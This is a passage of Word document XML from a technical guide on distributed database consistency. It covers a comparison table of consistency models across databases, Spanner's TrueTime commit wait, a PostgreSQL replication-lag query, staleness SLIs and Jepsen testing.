              <w:t>Eventual (reads from replica)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432D4E" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
            <w:r w:rsidRPr="005C5B1F">
              <w:t>Per-query (route to primary)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2DF993" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
            <w:r w:rsidRPr="005C5B1F">
              <w:t>Async WAL streaming</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w14:paraId="77210D3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64D197" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
            <w:r w:rsidRPr="005C5B1F">
              <w:t>MySQL Group Replication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C95FFB" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
            <w:r w:rsidRPr="005C5B1F">
              <w:t>Strong (within group)</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73D6A8" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
            <w:r w:rsidRPr="005C5B1F">
              <w:t>Per-transaction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FEC6E6" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
            <w:r w:rsidRPr="005C5B1F">
              <w:t>Paxos-based certification</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w14:paraId="51B4B64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03EE03" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
            <w:r w:rsidRPr="005C5B1F">
              <w:t>MongoDB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CEC16F" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
            <w:r w:rsidRPr="005C5B1F">
              <w:t>Tunable per-op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DF78B7" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
            <w:r w:rsidRPr="005C5B1F">
              <w:t>Yes (writeConcern, readConcern)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2709EF" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
            <w:r w:rsidRPr="005C5B1F">
              <w:t>Raft-like replication</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w14:paraId="480A6A3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C1417F" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
            <w:r w:rsidRPr="005C5B1F">
              <w:t>Cassandra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FA6E91" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
            <w:r w:rsidRPr="005C5B1F">
              <w:t>Tunable per-query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708AD0" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
            <w:r w:rsidRPr="005C5B1F">
              <w:t>Yes (CONSISTENCY level)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8A3B1B" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
            <w:r w:rsidRPr="005C5B1F">
              <w:t>Quorum-based</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w14:paraId="4D9936F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9A10CE" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
            <w:r w:rsidRPr="005C5B1F">
              <w:t>DynamoDB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839197" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
            <w:r w:rsidRPr="005C5B1F">
              <w:t>Eventually consistent (default)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753722" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
            <w:r w:rsidRPr="005C5B1F">
              <w:t>Per-read (ConsistentRead)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D0CEC6" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
            <w:r w:rsidRPr="005C5B1F">
              <w:t>Leader-based writes, async replicas</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w14:paraId="17958E9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DF113E" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
            <w:r w:rsidRPr="005C5B1F">
              <w:lastRenderedPageBreak/>
              <w:t>CockroachDB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A52F6B" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
            <w:r w:rsidRPr="005C5B1F">
              <w:t>Strong (serializable)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19090A" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
            <w:r w:rsidRPr="005C5B1F">
              <w:t>No (always strong)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7CB76C" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
            <w:r w:rsidRPr="005C5B1F">
              <w:t>Raft consensus per range</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w14:paraId="2F9BC57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8B0C78" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
            <w:r w:rsidRPr="005C5B1F">
              <w:t>Spanner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6A2F7B" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
            <w:r w:rsidRPr="005C5B1F">
              <w:t>Strong (external consistency)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AC845C" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
            <w:r w:rsidRPr="005C5B1F">
              <w:t>No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5E8EDE" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
            <w:r w:rsidRPr="005C5B1F">
              <w:t>TrueTime + Paxos</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w14:paraId="72F2DB3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F473E1" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
            <w:r w:rsidRPr="005C5B1F">
              <w:t>Redis (single)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0E30F2" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
            <w:r w:rsidRPr="005C5B1F">
              <w:t>Strong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785BDA" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
            <w:r w:rsidRPr="005C5B1F">
              <w:t>N/A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688CEB" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
            <w:r w:rsidRPr="005C5B1F">
              <w:t>Single-threaded, single node</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w14:paraId="45E31ED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D12153" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
            <w:r w:rsidRPr="005C5B1F">
              <w:t>Redis (cluster)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F864AA" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
            <w:r w:rsidRPr="005C5B1F">
              <w:t>Eventual (async replication)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3A9CBB" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
            <w:r w:rsidRPr="005C5B1F">
              <w:t>Limited (WAIT command)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9B9D02" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
            <w:r w:rsidRPr="005C5B1F">
              <w:t>Async primary→replica</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w14:paraId="7C17321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239C30" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
            <w:r w:rsidRPr="005C5B1F">
              <w:t>etcd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2BB51B" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
            <w:r w:rsidRPr="005C5B1F">
              <w:t>Strong (linearizable)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CF9437" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
            <w:r w:rsidRPr="005C5B1F">
              <w:t>No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75DFCB" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
            <w:r w:rsidRPr="005C5B1F">
              <w:t>Raft consensus</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w14:paraId="72EE886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EA1AF7" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
            <w:r w:rsidRPr="005C5B1F">
              <w:t>Elasticsearch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193199" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
            <w:r w:rsidRPr="005C5B1F">
              <w:t>Eventual (NRT — ~1s delay)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909970" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
            <w:r w:rsidRPr="005C5B1F">
              <w:t>Limited (?refresh=true)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5B5C3E" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
            <w:r w:rsidRPr="005C5B1F">
              <w:t>Async replication + refresh interval</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w14:paraId="381A331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F45F2A" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
            <w:r w:rsidRPr="005C5B1F">
              <w:t>Kafka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F3B67C" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
            <w:r w:rsidRPr="005C5B1F">
              <w:t>Tunable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AC7FEC" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
            <w:r w:rsidRPr="005C5B1F">
              <w:t>acks=all (strong), acks=1 (weak)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B46883" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
            <w:r w:rsidRPr="005C5B1F">
              <w:t>ISR-based replication</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="602700D3" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C5B1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>9.2 Google Spanner — The "Impossible" System</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53578813" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="600C308B" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Spanner achieves externally consistent (strongest possible) reads/writes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EAF3710" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>across globally distributed nodes. Shouldn't this be impossible (latency)?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32E0303D" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F"/>
    <w:p w14:paraId="5DA75C51" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Trick: TrueTime API</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="788D6631" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  GPS + atomic clocks on every server → bounded clock uncertainty (typically &lt; 7ms).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63964CAD" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="180871D3" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  On commit: wait out the uncertainty interval (called "commit wait").</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1703717D" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  After commit-wait: GUARANTEED that no other transaction in the universe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A2586F9" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  could have a later timestamp and have committed before this one.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CB7F200" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07CBA113" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Read: use a timestamp → guaranteed to see all writes committed before that timestamp.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29EF1CC9" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55301E6A" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Cost: ~7ms added to every transaction (the commit-wait).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="320BA8B8" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Result: Strong consistency with global distribution — but writes are never &lt; ~7ms.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04545704" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:pict w14:anchorId="44ED7396">
          <v:rect id="_x0000_i6045" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="329AE276" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C5B1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>10. Measuring and Observing Consistency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AEE9092" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C5B1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>10.1 Measuring Replication Lag (Staleness Window)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D2D2AB9" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>SQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38CCD473" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>-- PostgreSQL: How far behind is the replica?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24FF0011" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">SELECT </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B2602B" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  now() - pg_last_xact_replay_timestamp() AS lag_duration,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07204337" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  pg_wal_lsn_diff(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BBF568A" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    pg_current_wal_lsn(),        -- primary's current position</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7667E9DC" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    pg_last_wal_replay_lsn()     -- replica's position</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B839556" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  ) AS lag_bytes;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5204B3D2" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F"/>
    <w:p w14:paraId="1973663E" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>-- If lag_duration &gt; your tolerance → you're experiencing eventual consistency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B262206" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>-- If lag_duration = 0 → effectively strongly consistent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00F447A7" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C5B1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>10.2 Staleness SLIs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="366D94BB" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24EF9337" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>SLI: "Percentage of reads that return data fresher than T seconds"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15EF7CA6" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F"/>
    <w:p w14:paraId="1F8DB3B7" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Measurement:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A342AEE" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  For each read: compare the read value's version/timestamp to the latest write.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E5FAFD2" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  If read_version &gt;= latest_write_version - T: "fresh"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E8F072" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  If read_version &lt; latest_write_version - T: "stale"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E5D0121" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F"/>
    <w:p w14:paraId="31014646" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Target SLO: 99.9% of reads are fresh within 1 second.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18F1CBDD" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>If violated: replicas are too far behind → investigate lag source.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F26AE5C" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C5B1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>10.3 Jepsen Testing (Formal Consistency Verification)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59FBC76D" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B1E8FCB" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Jepsen (Kyle Kingsbury) tests distributed databases:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E7F2780" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  1. Set up a cluster.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F1B41A6" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  2. Run concurrent operations (reads + writes).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53B26993" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  3. Inject faults (network partitions, node crashes, clock skew).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E89185F" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  4. Verify observed history against claimed consistency model.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C78EAE5" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75D85317" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Results: Many databases claiming "strong consistency" actually violate it under partitions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06F89BF6" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  - Found bugs in MongoDB, Cassandra, CockroachDB, etcd, Redis, and others.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A83D090" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  - Essential validation for any system claiming consistency guarantees.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DE4CD85" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
